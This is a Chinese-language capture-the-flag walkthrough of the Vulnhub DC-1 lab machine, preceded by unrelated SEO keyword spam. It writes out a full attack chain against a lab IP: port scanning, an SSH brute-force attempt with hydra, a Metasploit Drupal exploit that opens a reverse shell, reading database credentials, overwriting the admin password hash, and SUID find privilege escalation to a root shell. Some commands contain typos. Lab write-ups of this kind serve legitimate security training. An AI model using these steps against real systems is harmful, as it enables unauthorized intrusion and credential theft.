信息展示网站系统,网站策划书怎么写,昆明网络推广公司哪家好,淘宝关键词查询工具哪个好Vulnhub靶机:DC-1渗透详细过程 目录 Vulnhub靶机:DC-1渗透详细过程一、将靶机导入到虚拟机当中二、攻击方式主机发现端口扫描web渗透利用msf反弹shell数据库信息web管理员密码提权 一、将靶机导入到虚拟机当中
靶机地址#xff1a;
https://www.vulnhub.com/entry/dc-1-1,29…Vulnhub靶机:DC-1渗透详细过程 目录 Vulnhub靶机:DC-1渗透详细过程一、将靶机导入到虚拟机当中二、攻击方式主机发现端口扫描web渗透利用msf反弹shell数据库信息web管理员密码提权 一、将靶机导入到虚拟机当中
靶机地址
https://www.vulnhub.com/entry/dc-1-1,292/二、攻击方式
主机发现
使用arp-scan命令发现主机也可以使用nmap均可 端口扫描
nmap -p- 192.168.0.106开放了22端口以及80http端口服务接下来探针服务信息
nmap -sV -A 192.168.0.106由于开放了22端口我们可以尝试去爆破一下但是未果。
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.106探针还发现开放了80端口接下来可以进行访问web界面
web渗透
访问过后得到以下界面此web服务使用了Drupal CMS魔板 信息收集 我们回到kali端开启msf进行搜索相关的漏洞看有无可利用的如下
利用msf反弹shell
search drupal //搜索漏洞利用模块use 1 //尝试使用第一个API这个
set rhosts 192.168.0.106 //靶机目标ip
set lhosts 0.0.0.0
set lport 4444
exploit成功接收到shell并为普通www-data权限 当前目录下有flag1.txt查看一下提示 翻译每一个好的CMS都需要一个配置文件–你也一样。
数据库信息
根据提示找到他的配置文件不清楚得网上搜一下Drupal CMS配置文件在哪即可 进入到shell当中当前所在路径为/var/www直接进入到配置文件当中即可
cd /var/www/sites/default/
cat settings.php查看配置文件信息settings.php得到数据库的用户名和密码连接即可查看数据库内容 mysql -u dbuser -p
密码R0ck3t
或
mysql -u dbuser -pR0ck3t首先获取一个稳定shell交互性shell
python -c import pty;pty.spawn(/bin/bash)进入数据库当中查看所有数据库 web管理员密码
查看当前的数据库和users数据表查看users表当中的数据信息得到管理员用户名和密码但是密码被加密此加密是自带的加密方式需要找到加密脚本搜索一下 先把数据拿出来放到记事本当中。
搜索发现加密脚本在scripts当中的passwd-hash.sh 进入到此路径当中查看一下脚本信息
发现此脚本为php脚本由此用php来执行我们来获取一下自定义新密码从而更新数据库修改admin管理员的密码 php password-hash.sh admin //生成新密码回到数据库将admin密码更新成我们生成的这个自定义密码hash值即可。
UPDATE drupaldb.users SET password 自定义生成的密码hash值 WHERE username admin or username Fred;登录web界面进入后台即可。
提权
找到flag3.txt翻译如下
特殊的PERMS将帮助查找find密码-但您需要-exec命令来确定如何获得阴影中的内容。发现有find命令提示查看一下find命令得权限
ls -l $(which find)发现为root权限那么利用find提权即可当然提示当中也有说明使用-exec参数 find /etc/passwd -exec whomai \;获取一个shell命令如下
find /etc/passwd -exec /bin/sh \;方法二我们通过msf拿到shell以后可以直接走提权三部曲
查找系统当中拥有suid权限的命令有没有可利用的
find / -perm -us -type f 2/dev/null
或
find / -user root -perm -4000 print 2/dev/null直接发现了find命令可直接利用直接提权命令同方法一
find /etc/passwd -exec whomai \;文章不妥之处欢迎匹配指正